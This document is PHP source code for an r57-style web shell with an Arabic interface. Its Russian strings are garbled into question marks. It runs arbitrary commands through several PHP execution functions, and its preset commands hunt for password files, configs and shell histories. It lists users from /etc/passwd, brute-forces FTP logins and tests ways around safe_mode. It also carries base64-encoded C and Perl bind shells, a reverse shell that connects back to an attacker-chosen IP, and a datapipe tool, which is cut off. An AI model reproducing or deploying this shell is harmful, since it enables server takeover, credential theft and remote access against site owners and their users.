+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', +'ru_text86'=>'?????????? ????? ? ???????', +'ru_butt14'=>'???????', +'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????', +'ru_text88'=>'FTP-??????:????', +'ru_text89'=>'???? ?? ftp ???????', +'ru_text90'=>'????? ????????', +'ru_text91'=>'???????????? ?', +'ru_text92'=>'??? ?????????', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-????????', +'ru_text95'=>'?????? ?????????????', +'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', +'ru_text97'=>'????????? ??????????: ', +'ru_text98'=>'??????? ???????????: ', +'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', +'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', +'ru_text101'=>'???????????? ????? 
???????????? (user -> resu) ??? ???????????? ? ???????? ??????', +'ru_text102'=>'?????', +'ru_text103'=>'???????? ??????', +'ru_text104'=>'???????? ????? ?? ???????? ????', +'ru_text105'=>'????', +'ru_text106'=>'??', +'ru_text107'=>'????', +'ru_butt15'=>'?????????', +'ru_text108'=>'????? ??????', +'ru_text109'=>'????????', +'ru_text110'=>'??????????', +'ru_text111'=>'SQL-?????? : ????', +'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail', +'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list', +'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body', +'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()', +'ru_text116'=>'?????????? ????', +'ru_text117'=>'?', +'ru_text118'=>'???? ??????????', +'ru_text119'=>'?? ??????? ??????????? ????', +'ru_err0'=>'??????! ?? ???? ???????? ? ???? ', +'ru_err1'=>'??????! ?? ???? ????????? ???? ', +'ru_err2'=>'??????! ?? ??????? ??????? ', +'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????', +'ru_err4'=>'?????? ??????????? ?? ftp ???????', +'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????', +'ru_err6'=>'??????! ?? ??????? ????????? ??????', +'ru_err7'=>'?????? 
??????????', +/* --------------------------------------------------------------- */ +'eng_text1' =>'الامر المنفذ', +'eng_text2' =>'تنفيذ الاوامر في السيرفر', +'eng_text3' =>'امر التشغيل', +'eng_text4' =>'مكان عملك الان على السيرفر', +'eng_text5' =>'رفع ملف الى السيرفر', +'eng_text6' =>'مسار ملفك', +'eng_text7' =>'اوامر جاهزه', +'eng_text8' =>'اختر الامر', +'eng_butt1' =>'تنفيذ', +'eng_butt2' =>'رفـع', +'eng_text9' =>'فتح بورت في السيرفر على /bin/bash', +'eng_text10'=>'بـورت', +'eng_text11'=>'باسورد للدخول', +'eng_butt3' =>'فتح', +'eng_text12'=>'أتصـال عـكسي', +'eng_text13'=>'الاي بي', +'eng_text14'=>'المنفذ', +'eng_butt4' =>'أتـصال', +'eng_text15'=>'سحب ملفات الى السيرفر', +'eng_text16'=>'عن طريق', +'eng_text17'=>'رابط الملف', +'eng_text18'=>'مكان نزوله', +'eng_text19'=>'Exploits', +'eng_text20'=>'إستخدم', +'eng_text21'=>'&nbsp;الاسم الجديد', +'eng_text22'=>'انبوب البيانات', +'eng_text23'=>'البورت المحلي', +'eng_text24'=>'السيرفر البعيد', +'eng_text25'=>'المنفذ البعيد', +'eng_text26'=>'استخدم', +'eng_butt5' =>'تشغيل', +'eng_text28'=>'العمل في الوضع الامن', +'eng_text29'=>'ممنوع الدخول', +'eng_butt6' =>'تغير', +'eng_text30'=>'عرض ملف', +'eng_butt7' =>'عرض', +'eng_text31'=>'الملف غير موجود', +'eng_text32'=>'تنفيذ كود php عن طريق داله eval', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'اختبار', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'القاعدة . 
الجدول', +'eng_text37'=>'اسم المستخدم', +'eng_text38'=>'كلمة المرور', +'eng_text39'=>'القاعدة', +'eng_text40'=>'نسخة من جداول القاعدة', +'eng_butt9' =>'نسخة', +'eng_text41'=>'حفظ النسخة في', +'eng_text42'=>'تعديل الملفات', +'eng_text43'=>'الملف المراد تعديله', +'eng_butt10'=>'حفظ', +'eng_text44'=>'لاتستطيع التعديل على هذا الملف فقط تقرأ', +'eng_text45'=>'تم الحفظ', +'eng_text46'=>'عرض phpinfo()', +'eng_text47'=>'رؤية المتغيرات في php.ini', +'eng_text48'=>'مسح ملفات الـ temp', +'eng_butt11'=>'تحرير الملف', +'eng_text49'=>'مسح السكربت من السيرفر', +'eng_text50'=>'عرض معلومات الذاكرة الرئيسية', +'eng_text51'=>'عرض معلومات الذاكرة', +'eng_text52'=>'بحث نص', +'eng_text53'=>'في المسار', +'eng_text54'=>'بحث عن نص في الملفات', +'eng_butt12'=>'بحث', +'eng_text55'=>'فقط في الملفات', +'eng_text56'=>'لايوجد :(', +'eng_text57'=>'انشاء/مسح ملف/مجلد', +'eng_text58'=>'الاسم', +'eng_text59'=>'ملف', +'eng_text60'=>'مجلد', +'eng_butt13'=>'إنشاء /مسح', +'eng_text61'=>'تم إنشاء الملف', +'eng_text62'=>'تم إنشاء المجلد', +'eng_text63'=>'تم مسح الملف', +'eng_text64'=>'تم مسح المجلد', +'eng_text65'=>'إنشاء', +'eng_text66'=>'مسح', +'eng_text67'=>'التصريح/المستخدم/المجموعة', +'eng_text68'=>'امر', +'eng_text69'=>'إسم الملف', +'eng_text70'=>'التصريح', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'النص المراد', +'eng_text73'=>'بحث في المجلدات', +'eng_text74'=>'بحث في الملفات', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'البحث عن نص في ملفات بواسطه find', +'eng_text80'=>'النوع', +'eng_text81'=>'الإتصالات', +'eng_text82'=>'قواعد البيانات', +'eng_text83'=>'تشغيل امر استعلام', +'eng_text84'=>'استعلام قاعدة', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'تنزيل ملفات من السيرفر', +'eng_butt14'=>'تحميل', +'eng_text87'=>'تنزيل ملفات من خادم الاف تي بي', +'eng_text88'=>'سيرفر الاف تي بي:المنفذ', +'eng_text89'=>'ملف في الاف 
تي بي', +'eng_text90'=>'التحويل الى', +'eng_text91'=>'ارشفة', +'eng_text92'=>'من غير الارشفة', +'eng_text93'=>'الاف تي بي', +'eng_text94'=>'تخمين الاف تي بي', +'eng_text95'=>'قائمة المستخدمين', +'eng_text96'=>'لم يستطع سحب قائمة المستخدمين', +'eng_text97'=>'تم الفحص: ', +'eng_text98'=>'تم بنجاح: ', +'eng_text99'=>'* استخدم اسماء المستخدمين في ملف /etc/passwd لدخول للـ ftp', +'eng_text100'=>'ارسال ملف الى خادم الاف تي بي', +'eng_text101'=>'استخدم الاسامي معكوسه لتخمينها', +'eng_text102'=>'خدمات البريد', +'eng_text103'=>'ارسال بريد', +'eng_text104'=>'ارسال ملف الى الايميل', +'eng_text105'=>'إلى', +'eng_text106'=>'مـن', +'eng_text107'=>'الموضوع', +'eng_butt15'=>'إرسال', +'eng_text108'=>'الرسالة', +'eng_text109'=>'مخفي', +'eng_text110'=>'عرض', +'eng_text111'=>'سيرفر قواعد البيانات : المنفذ', +'eng_text112'=>'قرائة الملفات عن طريق ثغرة داله mb_send_mail', +'eng_text113'=>'قرائة محتوى المجلدات عن طريق via imap_list', +'eng_text114'=>'قرائة الملفات عن طريق ثغرة via imap_body', +'eng_text115'=>'قرائة الملفات عن طريق compress.zlib://', +'eng_text116'=>'نسخ من', +'eng_text117'=>'الى', +'eng_text118'=>'تم نسخ الملف', +'eng_text119'=>'لايستطيع النسخ', +'eng_err0'=>'خطاء ! لايمكن الكتابة على هذا الملف ', +'eng_err1'=>'خطاء ! غير قادر على قرائه هذا الملف ', +'eng_err2'=>'خطاء! لايمكن الانشاء ', +'eng_err3'=>'خطاء! غير قادر على الاتصال بالاف تي بي', +'eng_err4'=>'خطاء ! لاتستطيع الدخول الى سيرفر الاف تي بي', +'eng_err5'=>'خطاء ! لاتستطيع تغير المجلد في الاف تي بي', +'eng_err6'=>'خطاء ! لاتستطيع ارسال رساله', +'eng_err7'=>'البريد ارسل', +'eng_text200'=>'قرائة الملفات عن طريق ثغرة copy()', +'eng_text202'=>'مسار الملف المراد قرائته', +'eng_text300'=>'قرائه الملفات عن طريق ثغرة curl()', +'eng_text302'=>'مسار الملف المراد قرائته', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. 
+*/ +$aliases=array( +'البحث عن ملفات suid'=>'find / -type f -perm -04000 -ls', +'البحث عن ملفات suid في المجلد الحالي'=>'find . -type f -perm -04000 -ls', +'البحث عن ملفات suid'=>'find / -type f -perm -02000 -ls', +'البحث عن ملفات suid في المجلد الحالي'=>'find . -type f -perm -02000 -ls', +'البحث عن ملفات config.inc.php'=>'find / -type f -name config.inc.php', +'البحث عن ملفات config.inc.php في المجلد الحالي'=>'find . -type f -name config.inc.php', +'البحث عن ملفات config* بجميع الامتدادات'=>'find / -type f -name "config*"', +'البحث عن ملفات config* في المجلد الحالي'=>'find . -type f -name "config*"', +'البحث عن الملفات القابلة للكتابة'=>'find / -type f -perm -2 -ls', +'البحث عن الملفات القابلة للكتابة في المجلد الحالي'=>'find . -type f -perm -2 -ls', +'البحث عن المجلدات القابلة للكتابة'=>'find / -type d -perm -2 -ls', +'البحث عن المجلدات القابلة للكتابة في المسار الحالي'=>'find . -type d -perm -2 -ls', +'البحث عن ملفات ومجلدات قابلة للكتابة'=>'find / -perm -2 -ls', +'البحث عن ملفات ومجلدات في المسار الحالي'=>'find . -perm -2 -ls', +'البحث عن ملفات service.pwd'=>'find / -type f -name service.pwd', +'البحث عن ملفات service.pwd في المسار الحالي'=>'find . -type f -name service.pwd', +'البحث عن كل ملفات الجدران النارية .htpasswd'=>'find / -type f -name .htpasswd', +'البحث عن جميع ملفات الجدران النارية في المسار الحالي'=>'find . -type f -name .htpasswd', +'البحث عن جميع ملفات .bash_history'=>'find / -type f -name .bash_history', +'البحث عن جميع ملفات .bash_history في المسار الحالي'=>'find . -type f -name .bash_history', +'البحث عن جميع ملفات .mysql_history'=>'find / -type f -name .mysql_history', +'البحث عن جميع ملفات .mysql_history في المسار الحالي'=>'find . -type f -name .mysql_history', +'البحث عن جميع ملفات .fetchmailrc'=>'find / -type f -name .fetchmailrc', +'البحث عن جميع ملفات .fetchmailrc في المسار الحالي'=>'find . 
-type f -name .fetchmailrc', +'اخر ملفات مشغله في النظام'=>'lsattr -va', +'رؤية البورتات المفتوحة في السيرفر'=>'netstat -an | grep -i listen', +'رؤية حالة المجلدات وامكانية التنفيذ'=>'cat /etc/fstab', +'مشاهدة ملف اللوق لدخول السي بانل والمواقع على السيرفر'=>'cat /var/cpanel/accounting.log', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#000000><font face=tahoma size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Webdings color=gray>4</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=tahoma size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $unix = 0; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new 
SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3); + $r .= (!$unix)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + 
foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function err($n,$txt='') +{ +echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '</b></div></font></td></tr></table>'; +return null; +} +function perms($mode) +{ +if (!$GLOBALS['unix']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value,$checked=0) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." 
"; } + $ret .= "value=\"".$value."\""; + if($checked) $ret .= " checked"; + return $ret.">"; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." 
&& $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + 
if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; 
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd 
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy 